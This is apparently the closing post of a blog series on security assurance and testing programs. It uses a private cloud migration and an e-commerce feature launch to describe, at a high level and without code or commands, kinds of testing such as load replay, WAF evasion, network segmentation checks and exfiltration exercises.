We started this Security Assurance and Testing (SA&T) series with the need for testing and which tactics make sense within an SA&T program. But it is always helpful to see how the concepts apply to more tangible situations. So we will now show how the SA&T program can provide a quick win for the security team, with two (admittedly contrived) scenarios that show how SA&T can be used – both at the front end of a project, and on an ongoing basis, to ensure the organization is well aware of its security posture.

Infrastructure Upgrade

For this first scenario let’s consider an organization’s move to a private cloud environment to support a critical application. This is a common situation these days. The business driver is better utilization of data center resources and more agility for deploying hardware resources to meet organizational needs.

Obviously this is a major departure from the historical rack and provision approach. This is attractive to organizations because it enables better operational orchestration, allowing for new devices (‘instances’ in cloud land) to be spun up and taken down automatically according to the application’s scalability requirements. The private cloud architecture folks aren’t totally deaf to security, so some virtualized security tools are implemented to enforce network segmentation within the data center and block some attacks from insider threats.

Without an SA&T program you would probably sign off on the architecture (which does provide some security) and move on to the next thing on your list. There wouldn’t be a way to figure out whether the environment is really secure until it went live, and then attackers will let you know quickly enough. Using SA&T techniques you can potentially identify issues at the beginning of implementation, saving everyone a bunch of heartburn. Let’s enumerate some of the tests to get a feel for what you may find:

  • Infrastructure scalability: You can capture network traffic to the application, and then replay it to test scalability of the environment. After increasing traffic into the application, you might find that the cloud’s auto-scaling capability is inadequate. Or it might scale a bit too well, spinning up new instances too quickly, or failing to take down instances quickly enough. All these issues impact ability and value of the private cloud to the organization, and handling them properly can save a lot of heartburn for Ops.
  • Security scalability: Another infrastructure aspect you can test is its security – especially virtualized security tools. By blasting the environment with a ton of traffic, you might discover your virtual security tools crumble rather than scaling – perhaps because VMs lack custom silicon – and fall over. This failure normally either “fails open”, allowing attacks, or “fails closed”, impacting availability. You may need to change your network architecture to expose your security tools only to the amount of traffic they can handle. Either way, better to identify a potential bottleneck before it impairs either availability or security. A quick win for sure.
  • Security evasion: You can also test security tools to see how they deal with evasion. If the new tools don’t use the same policy as the perimeter, which has been tuned to effectively deal with evasion, the new virtual device may require substantial tuning to ensure security within the private cloud.
  • Network hopping: Another feature of private clouds is their ability to define network traffic flows and segmentation – “Software Defined Networks”. But if the virtual network isn’t configured correctly, it is possible to jump across logical segments to access protected information.
  • Vulnerability testing of new instances: One of the really cool (and disruptive) aspects of cloud computing is elimination of the need for changing/tuning configurations and patching. Just spin up a new instance, fully patched and configured correctly, move the workload over, and take down the old one. But if new instances spin up with vulnerabilities or poor configurations, auto-scaling is not your friend. Test new instances on an ongoing basis to ensure proper security. Again, a win if something was amiss.

As you see, many things can go wrong with any kind of infrastructure upgrade. A strong process to find breaking points in the infrastructure before going live can mitigate much of the deployment risk – especially if you are dealing with new equipment. Given the dynamic nature of technology you will want to make sure you are testing the environment on an ongoing basis, as well ensuring that change doesn’t add unnecessary attack surface.

This scenario points out where many issues can be found. What happens if you can’t find any issues? Does that impact the value of the SA&T program? Actually, if anything, it enhances its value – by providing peace of mind that the infrastructure is ready for production.

New Application Capabilities

To dig into another scenario, let’s move up the stack a bit to discuss how SA&T applies to adding new capabilities within an application serving a large user community, to enable commerce on a web site. Business folks like to sell stuff, so they like these kinds of new capabilities. This initiative involves providing access to a critical data store previously inaccessible directly from an Internet-facing application, which is an area of concern.

The development team has run some scans against the application to identify application layer issues such as XSS, and fixed them before deployment by front-ending the application with a WAF. So a lot of the low-hanging fruit of application testing is gone. But that shouldn’t be the end of testing. Let’s look into some other areas which could uncover issues by focusing on realistic attack patterns and tactics:

  • Attack the stack: You could use a slow HTTP attack to see if the application can defend against availability attacks on the stack. These attacks are very hard to detect at the network layer so you need to make sure the underlying stack is configured to deal with them.
  • Shopping cart attack: Another type of availability attack uses the application’s legitimate functionality against it. It’s a bit like an autoimmune disease, where the application’s capabilities attack itself. By overwhelming the shopping cart (in an automated fashion), attackers overwhelm the site as it tries to provide billions of search results – again impacting response time and application availability. That’s no good for a commerce application.
  • WAF evasion: You can also go significantly deeper into the application by trying to evade the defenses in front of it, such as a WAF. We mentioned above that an application security scanner showed no issues with XSS because the WAF blocked it. But by easily evading the WAF, a more sophisticated testing capability showed the application was a sitting duck for buffer overflow and XSS attacks. A simple app scanning tool cannot provide those kinds of results.
  • Go after the data: By compromising different parts of the application stack – such as application servers – attackers can position themselves to attack the data store. As part of the testing process, try to find and address the data store directly. Many database security controls run in front of the database to avoid impacting performance of the DBMS, so if an attacker can figure out how to connect directly to the database it might be “Game Over”.

As with fully testing the infrastructure, a deeper level of application testing may reveal issues that could cause downtime or data loss. The challenging part of application testing is that attackers can use legitimate functionality – including search and shopping carts – to attack, making it even harder to determine true production readiness.

But you aren’t done yet. As mentioned in the tactics post, you can and should also be running frequent exfiltration attacks to determine whether data can be removed from your network. This ongoing testing assesses the vigilance of your security team and the effectiveness of your processes. Alerts streaming from content filtering tools are all well and good, but unless someone is validating each alert and determining the extent of any potential data loss, the alert is worthless. So an SA&T program not only tests the technology underpinnings of the environment, but the real effectiveness of the security function.

Handling the Truth

These kinds of findings from an SA&T program may be controversial within the organization – especially if Operations or Development is under significant pressure to complete the project. These efforts can be perceived as a roadblock, getting in the way of delivering value to customers and generating revenue. That is all too common – some leaders may resist holding up the project to address issues you find. The only way to address this resistance is with information. By being very clear about the downside (risk) of identified issues, you can enable business leaders to make business decisions about whether to accept risk and moving forward, or to hold up until the issues are addressed.

Keep the SA&T program in perspective. If leadership decides to move forward anyway – despite significant issues – keep in mind that this does not indicate a program failure. The goal of SA&T to provide information needed to make educated decisions. A program should not be evaluated based on whether its findings are ignored, or the consequences of those decisions. Just make sure to document the findings so the team can rise above fingerpointing if issues do crop up.

Summary

As we wrap up this Security Assurance and Testing series, let’s highlight a few key points. First, you don’t know what is truly at risk until you actually attack yourself. Attackers don’t play nice, so tabletop exercises, threat models, and simple vulnerability scanners are inadequate to truly assess your infrastructure for the information needed to really understand how your environment can be exploited.

Don’t forget to pay attention to the network/security device your technology infrastructure is built upon. Attackers take the path of least resistance, and if your infrastructure is brittle they will figure that out and go through the front door. Then they get to save their fancy advanced 0-day attacks for an environment that deserves it.

Finally, the SA&T program involves ongoing testing over as much of the environment as possible, including infrastructure and applications. Make sure you are testing for both availability/scalability and evasion of controls because both provide opportunity for an attacker to gain presence in your environment. The SA&T program should include the ability to test on an ongoing basis, as well as ad hoc testing when the environment undergoes significant change.

Share: